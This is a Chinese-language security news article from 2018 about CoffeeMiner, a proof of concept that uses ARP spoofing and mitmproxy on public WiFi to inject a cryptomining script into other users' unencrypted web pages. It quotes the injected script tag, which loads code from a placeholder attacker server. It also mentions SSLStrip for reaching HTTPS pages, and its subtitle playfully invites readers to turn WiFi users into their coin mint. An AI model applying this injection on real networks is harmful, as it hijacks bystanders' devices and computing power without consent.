利用公共WiFi挖矿的脚本(注:仅作研究使用)
作者: 日期:2018年01月11日 阅:21,017

让使用公共WiFi的不明真相群众变身你的造币机

拜比特币之类加密货币高到离谱的价值所赐,加密货币挖矿代码已经成了将计算周期转换为潜在金钱的常见手法,无论这些计算周期是经过授权的还是偷来的。

杀毒软件和广告过滤软件制造商已经对此作出响应,试图阻止挖矿代码劫持CPU时间,尤其是在浏览器中。

西班牙一位名为阿尔诺的开发人员发布了一个概念验证(PoC)演示,可以将挖矿代码注入到接入公共WiFi网络的浏览器会话中。喜欢挑战计算机法律法规的人,还有喜欢研究计算机安全的人,可能会对该PoC感兴趣。

咖啡馆挖矿机(CoffeeMiner)是这个项目的名称,该项目可被用于发起中间人攻击,也就是网络窃贼们在星巴克之类提供WiFi的地方常用的攻击。

CoffeeMiner脚本可以在局域网上进行地址解析协议(ARP)欺骗,窃听网络中其他设备的未加密流量。

该脚本利用名为mitmproxy的软件执行中间人攻击,将下列HTML代码行注入到网络中其他人请求的非HTTPS(即未加密)网页中。

<script src=”http://httpserverIP:8000/script.js” type=”text/javascript”></script>

一旦被加载,这些网页就会执行JavaScript代码,抽取CPU时间,利用CoinHive的挖矿软件来挖掘名为Monero的加密货币。

正如阿尔诺阐述的,在VirtualBox虚拟机环境中演示的这一攻击,还可以被自动化。公布出来的版本对HTTPS网页请求不起作用,但加上SSLStrip就能补上这一不足。

该代码基本上是Python脚本,可在GitHub(https://github.com/arnaucode/coffeeMiner)上下载。

相关阅读

加密货币劫持是什么鬼?

海盗湾偷偷劫持用户CPU计算资源挖矿加密货币

无文件攻击有多阴险 竟利用“永恒之蓝”传播挖矿机

 

申明:本文系厂商投稿收录,所涉观点不代表安全牛立场!


相关文章